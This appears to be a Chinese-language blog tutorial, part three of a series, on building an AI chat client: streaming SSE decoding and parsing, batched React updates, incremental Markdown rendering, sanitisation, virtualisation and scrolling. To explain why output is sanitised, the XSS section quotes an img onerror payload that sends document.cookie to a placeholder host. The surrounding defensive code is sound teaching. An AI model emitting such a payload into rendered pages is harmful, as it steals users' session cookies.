Skip to content

Go back

从零实现AI助手 - 流式渲染与增量解析《三》

Published:  at 

文章目录

系列导航


渲染全链路:字节 → 文本 → 状态 → DOM

  1. 网络层:浏览器从 ReadableStream<Uint8Array> 持续读取字节流。
  2. 解码层:使用 TextDecoderstream: true)将分片字节解码为连续文本。
  3. 协议层:按 SSE 规则解析文本行与事件块,提取 data: 内容。
  4. 业务层(缓冲):将多段 delta 先放入缓冲区,按 RAF 或固定间隔批量合并。
  5. 业务层(状态):把合并后的文本增量写入 zustand 中对应消息的 content
  6. 视图层(Markdown):将消息内容做 Markdown 解析并进行安全净化。
  7. 视图层(高亮):在流式完成后执行代码高亮,避免每个增量都重复高亮。

为何必须 TextDecoder(..., { stream: true })

UTF-8 多字节字符可能被 TCP 分包截断。若每次 decode(value) 默认 stream: false半个字符可能被替换为 “ 或乱码。

示例(概念):emoji 😀 占 4 字节,第一次 read() 只拿到 2 字节、第二次再拿 2 字节;第二次合并前必须用 stream: true 让解码器保留不完整序列。

const decoder = new TextDecoder();
let buffer = "";

function onChunk(chunk: Uint8Array) {
  buffer += decoder.decode(chunk, { stream: true });
  // 再按 \n\n 切 SSE
}

流结束时再调用一次 decoder.decode() 无参数 冲刷内部挂起字节。


可测试的 SSE 解析器

把「行缓冲 + data: 提取 + 多行 event」收敛成纯函数,便于 Vitest。

export type SSEHandler = (dataLine: string) => void;

/** 喂入任意片段,内部按 \n 拆行;完整行触发 onLine */
export function createLineParser(onLine: (line: string) => void) {
  let buf = "";
  return (chunk: string) => {
    buf += chunk;
    const lines = buf.split("\n");
    buf = lines.pop() ?? "";
    for (const line of lines) onLine(line);
  };
}

/** 将 SSE event 块(已按 \n\n 分开)解析为 data 行合并 */
export function parseSSEBlock(block: string): string | null {
  const lines = block.split("\n").map((l) => l.trimEnd());
  const dataLines: string[] = [];
  for (const line of lines) {
    if (line.startsWith(":")) continue; // 注释心跳
    if (line.startsWith("data:")) dataLines.push(line.slice(5).trimStart());
  }
  if (dataLines.length === 0) return null;
  return dataLines.join("\n");
}

export function createSSEParser(onDataJson: (raw: string) => void) {
  let blockBuf = "";

  return (textChunk: string) => {
    blockBuf += textChunk;
    const parts = blockBuf.split("\n\n");
    blockBuf = parts.pop() ?? "";
    for (const block of parts) {
      const data = parseSSEBlock(block);
      if (data != null) onDataJson(data);
    }
  };
}

Vitest 示例

import { describe, it, expect, vi } from "vitest";
import { parseSSEBlock, createSSEParser } from "./sseParser";

describe("parseSSEBlock", () => {
  it("joins multi-line data", () => {
    const block = "event: msg\ndata: {\"a\":1}\ndata: line2\n";
    expect(parseSSEBlock(block)).toBe('{"a":1}\nline2');
  });
});

describe("createSSEParser", () => {
  it("emits two JSON payloads", () => {
    const spy = vi.fn();
    const feed = createSSEParser((raw) => spy(JSON.parse(raw)));
    feed('data: {"type":"delta","text":"a"}\n\n');
    feed('data: {"type":"done"}\n\n');
    expect(spy).toHaveBeenNthCalledWith(1, { type: "delta", text: "a" });
    expect(spy).toHaveBeenNthCalledWith(2, { type: "done" });
  });
});

外层循环仍是:buffer += decoder.decode(...); sseParser(buffer 增量) —— 可把 blockBufdecoder 组合在一个 readLoop 里(第二篇已给雏形,此处强调双缓冲:字节解码缓冲 + SSE 块缓冲)。


useStreamBuffer:按帧合并 delta

避免每个 token setState 触发整树 reconcile:

import { useCallback, useEffect, useRef } from "react";

export function useStreamBuffer(onFlush: (merged: string) => void) {
  const pending = useRef("");
  const raf = useRef<number | null>(null);

  const flush = useCallback(() => {
    if (!pending.current) return;
    const chunk = pending.current;
    pending.current = "";
    onFlush(chunk);
    raf.current = null;
  }, [onFlush]);

  const push = useCallback(
    (delta: string) => {
      pending.current += delta;
      if (raf.current == null) {
        raf.current = requestAnimationFrame(flush);
      }
    },
    [flush]
  );

  useEffect(() => () => {
    if (raf.current != null) cancelAnimationFrame(raf.current);
  }, []);

  return { push, flushNow: flush };
}

在 SSE onEvent 里对 type==='delta' 调用 push(text),在 done 时先 flushNow() 再更新 status

Profiler 对比(文字结论):逐 token 更新在 2k token 场景下容易上千次 commit;RAF 合并通常压到每秒数十次,主线程时间与布局次数明显下降。


流式 Markdown:边界补丁 safeRenderMarkdown

流式中途常见「半个代码围栏、半个链接」。策略:

  1. 奇数个 → 临时追加闭合 仅用于本次 parse,写回 store。
  2. 行内未闭合 `:可追加尾部 `
  3. 未闭合链接 [text:不要交给 marked 当链接,整体当普通文本(或 escape)。
function balanceFences(src: string): string {
  const matches = src.match(/```/g);
  if (matches && matches.length % 2 === 1) return `${src}\n\`\`\``;
  return src;
}

export function safeRenderMarkdown(isStreaming: boolean, raw: string): string {
  if (!isStreaming) return raw;
  return balanceFences(raw);
}

表格、LaTeX 等更复杂语法可继续加规则,或流式阶段仅用轻量渲染(换行+粗体),done 后全量 marked。


代码高亮策略:流式 vs 完成

import { memo, useMemo } from "react";
import { marked } from "marked";
import hljs from "highlight.js";
import DOMPurify from "dompurify";

marked.setOptions({ gfm: true, breaks: true });

const renderer = new marked.Renderer();
renderer.code = ({ text, lang }) => {
  const language = lang && hljs.getLanguage(lang) ? lang : "plaintext";
  const highlighted = hljs.highlight(text, { language }).value;
  return `<pre class="hljs"><code class="language-${language}">${highlighted}</code></pre>`;
};

type Props = { content: string; isStreaming: boolean };

export const MarkdownRenderer = memo(function MarkdownRenderer({
  content,
  isStreaming,
}: Props) {
  const html = useMemo(() => {
    const src = safeRenderMarkdown(isStreaming, content);
    if (isStreaming) {
      const plain = marked.parse(src, { async: false, renderer: undefined }) as string;
      return DOMPurify.sanitize(plain);
    }
    marked.use({ renderer });
    const rich = marked.parse(src, { async: false }) as string;
    return DOMPurify.sanitize(rich);
  }, [content, isStreaming]);

  return <div className="markdown-body" dangerouslySetInnerHTML={{ __html: html }} />;
});

流式分支可换「不加 renderer」的简化 parse;关键是 sanitize 永远最后一步,防止模型输出 <img onerror=...>


XSS 为何必须防

模型可能被诱导输出:

<img src=x onerror="fetch('https://evil?c='+document.cookie)">

DOMPurify.sanitize 默认剥离事件属性。若允许 a[href],需限制协议(javascript: 禁用)。


列表性能:虚拟化

长会话用 @tanstack/react-virtual

import { useVirtualizer } from "@tanstack/react-virtual";

export function MessageList({ messages, parentRef }: { messages: unknown[]; parentRef: React.RefObject<HTMLDivElement | null> }) {
  const rowVirtualizer = useVirtualizer({
    count: messages.length,
    getScrollElement: () => parentRef.current,
    estimateSize: () => 72,
    overscan: 6,
  });
  return (
    <div style={{ height: rowVirtualizer.getTotalSize(), position: "relative" }}>
      {rowVirtualizer.getVirtualItems().map((vi) => (
        <div
          key={vi.key}
          style={{
            position: "absolute",
            top: 0,
            left: 0,
            width: "100%",
            transform: `translateY(${vi.start}px)`,
          }}
        >
          {/* MessageBubble */}
        </div>
      ))}
    </div>
  );
}

每条 MessageBubblemessage.idkey,避免 index key 在插入时导致子树重建。


自动滚动与用户「上滑取消跟随」

const containerRef = useRef<HTMLDivElement>(null);
const stickToBottom = useRef(true);

useEffect(() => {
  const el = containerRef.current;
  if (!el || !stickToBottom.current) return;
  el.scrollTo({ top: el.scrollHeight, behavior: "instant" as ScrollBehavior });
}, [messages]);

function onScroll() {
  const el = containerRef.current;
  if (!el) return;
  const threshold = 80;
  const atBottom = el.scrollHeight - el.scrollTop - el.clientHeight < threshold;
  stickToBottom.current = atBottom;
}

打字机效果:选 A 还是选 B

方案做法适用
A直接展示 store 里累积的 content默认推荐,SSE 本身就是打字机
B本地再维护 char 队列逐字显示非流式一次性返回、或产品要求「匀速」与网络解耦

B 的最小队列(节选):

const [shown, setShown] = useState("");
const target = useRef("");
useEffect(() => {
  target.current = fullContentFromParent;
}, [fullContentFromParent]);

useEffect(() => {
  const id = window.setInterval(() => {
    setShown((s) => {
      if (s.length >= target.current.length) return s;
      return target.current.slice(0, s.length + 2);
    });
  }, 30);
  return () => clearInterval(id);
}, []);

小结

下一篇:中断、错误处理、超时与防抖



Previous Post
从零实现AI助手 - 中断、错误与防抖《四》
Next Post
从零实现AI助手 - 消息结构与状态管理《二》